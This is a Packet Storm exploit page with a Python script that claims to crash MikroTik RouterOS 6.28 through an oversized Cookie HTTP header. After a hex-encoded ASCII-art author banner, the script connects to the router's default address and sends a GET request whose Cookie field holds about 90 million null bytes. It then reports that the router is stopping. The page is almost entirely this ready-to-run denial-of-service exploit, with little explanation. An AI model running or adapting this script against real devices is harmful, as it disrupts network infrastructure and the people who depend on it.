Mikrotik RouterOS version 6.28 suffers from a cookie HTTP request header buffer overflow vulnerability.
f9094809ee7a54b5ba82c3ce861b12c63658ce45783de7698e9d5d83a472dee0# mikrotik RouterOS v6.28 Cookie HTTP request header Buffer Overflow
# sultan albalawi
import socket
import sys
from time import sleep
def myB():
print "\x27\x27\x27\x0d\x0a\x20\x20\x20\x20\x20" \
"\x20\x20\x5c\x20\x20\x20\x2d\x20\x20\x2d\x20" \
"\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e" \
"\x20\x20\x2d\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d" \
"\x20\x2d\x20\x20\x2d\x20\x2d\x20\x20\x2d\x20" \
"\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a" \
"\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74" \
"\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \
"\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a" \
"\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
"\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20" \
"\x60\x2e\x20\x20\x20\x20\x2c\x3b\x27\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70" \
"\x50\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a" \
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x58\x20" \
"\x2f\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20" \
"\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" \
"\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20" \
"\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f" \
"\x60\x20\x60\x20\x28\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x0d\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x20" \
"\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x64" \
"\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20\x20" \
"\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74" \
"\x79\x60\x20\x20\x27\x20\x30\x20\x20\x30\x20" \
"\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a" \
"\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20" \
"\x20\x20\x20\x20\x7c\x0d\x0a\x20\x20\x20\x20" \
"\x2c\x20\x20\x20\x20\x20\x20\x20\x2c\x20\x20" \
"\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a" \
"\x2a\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20" \
"\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20" \
"\x20\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20" \
"\x20\x60\x2e\x5f\x2e\x27\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d" \
"\x5e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60\x20" \
"\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d" \
"\x2d\x2c\x2e\x2e\x5f\x3b\x2d\x2d\x2d\x3e\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20" \
"\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f" \
"\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a" \
"\x20\x20\x27\x20\x60\x20\x20\x20\x20\x2c\x20" \
"\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65" \
"\x77\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20" \
"\x20\x20\x60\x2e\x5f\x20\x2c\x20\x20\x27\x20" \
"\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x7c\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x7c" \
"\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x3b\x20\x2c\x27\x27\x2d\x2c\x3b\x27\x20\x60" \
"\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f" \
"\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x60\x60" \
"\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d\x2d\x60\x20" \
"\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20" \
"\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x5e\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x27\x2e\x20\x5f\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f" \
"\x5f\x5f\x20\x7c\x5f\x20\x20\x49\x50\x53\x20" \
"\x20\x20\x20\x20\x29\x0d\x0a\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20" \
"\x20\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \
"\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x53\x75\x6c\x74\x61\x6e\x20" \
"\x41\x6c\x62\x61\x6c\x61\x77\x69\x0d\x0a\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x68\x74\x74\x70\x73" \
"\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65" \
"\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65" \
"\x6e\x74\x65\x73\x74\x33\x0d\x0a\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61" \
"\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e" \
"\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e" \
"\x63\x6f\x6d\x0d\x0a\x20\x20\x20\x20\x20\x20" \
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \
"\t\t\t\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61" \
"\x63\x6b\x65\x74\x73\x74\x6f\x72\x6d\x73\x65\x63" \
"\x75\x72\x69\x74\x79\x2e\x63\x6f\x6d\x2f\x66\x69" \
"\x6c\x65\x73\x2f\x61\x75\x74\x68\x6f\x72\x2f\x31\x32\x35\x38\x36\x2f\r\n"\
"\x20\x20\x20\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d" \
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d" \
myB()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
print 'Failed to create socket'
sys.exit()
host = '192.168.88.1'
port = 80
s.connect((host, port))
print 'Socket Connected to ' +host
header = ['GET /',
'CONNECT /',
'DELETE /',
'TRACE /',
'HEAD /',
'OPTIONS /',
'PATCH /',
'POST /',
'PUT /',
'Forwarded:',
'Content-Language: ',
'Location:',
'Proxy-Authenticate:',
'Proxy-Authorization:',
'Range:',
'WWW-Authenticate:',
'X-Forwarded-For:',
'X-Forwarded-Host:',
'X-Forwarded-Proto:',
'Accept:',
'Accept-Charset:',
'Accept-Encoding:',
'X-Forwarded-Proto:',
'Front-End-Https:',
'X-Forwarded-Protocol:',
'X-Forwarded-Ssl:',
'X-Url-Scheme:',
'Accept-Language:',
'Accept-Ranges:',
'Access-Control-Allow-Credentials:',
'Access-Control-Allow-Headers:',
'Access-Control-Allow-Methods:',
'Access-Control-Allow-Origin:',
'Access-Control-Expose-Headers:',
'Access-Control-Max-Age:',
'Access-Control-Request-Headers:',
'Access-Control-Request-Method:',
'Age:',
'Cache-Control:',
'Connection:',
'Content-Disposition:',
'Content-Encoding:',
'Content-Length:',
'Content-Location:',
'Content-Security-Policy:',
'Content-Security-Policy-Report-Only:',
'Content-Type:',
'Cookie:',
'Cookie2:',
'DNT:',
'Date:',
'ETag:',
'Expires:',
'From:',
'Host:',
'If-Match:',
'If-Modified-Since:',
'If-None-Match:',
'If-Range:',
'If-Unmodified-Since:',
'Keep-Alive:',
'Last-Modified:',
'Location:',
'Origin:',
'Pragma:',
'Public-Key-Pins:',
'Public-Key-Pins-Report-Only:',
'Referer:',
'Referrer-Policy:',
'Retry-After:',
'Server:',
'Set-Cookie:',
'Set-Cookie2:',
'Strict-Transport-Security:',
'TE:',
'Tk:',
'Trailer:',
'Transfer-Encoding:',
'Upgrade-Insecure-Requests:',
'User-Agent:',
'Vary:',
'Via:',
'Warning:',
'X-Content-Type-Options:',
'X-DNS-Prefetch-Control:',
'X-Frame-Options:',
'X-XSS-Protection:']
print "http_heders : ",len(header)
m=len(header)
print header[47] +"this vulnerability "
for i in range(m):
A="\0"*90590000
message=("GET /graphs/ HTTP/1.1\r\n"
"Host: "+host+"\r\n"
"Accept: */*\r\n"
"Accept-Language: en\r\n"
"User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\n"
"Connection: close\r\n"
"Referer:"+host+'/graphs\r\n'+
header[47]+"username="+A)
try:
s.sendall(message)
print "send pyload ok..."
#s.sendall(message)
except socket.error:
print 'Send failed'
sys.exit()
sleep(30)
for re in range(1,20):
print re
print "mikrotik RouterOS v6.28 stopping"
#reply = s.recv(4096)
#sss=s.recv(4096)
#print reply
#print sss
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed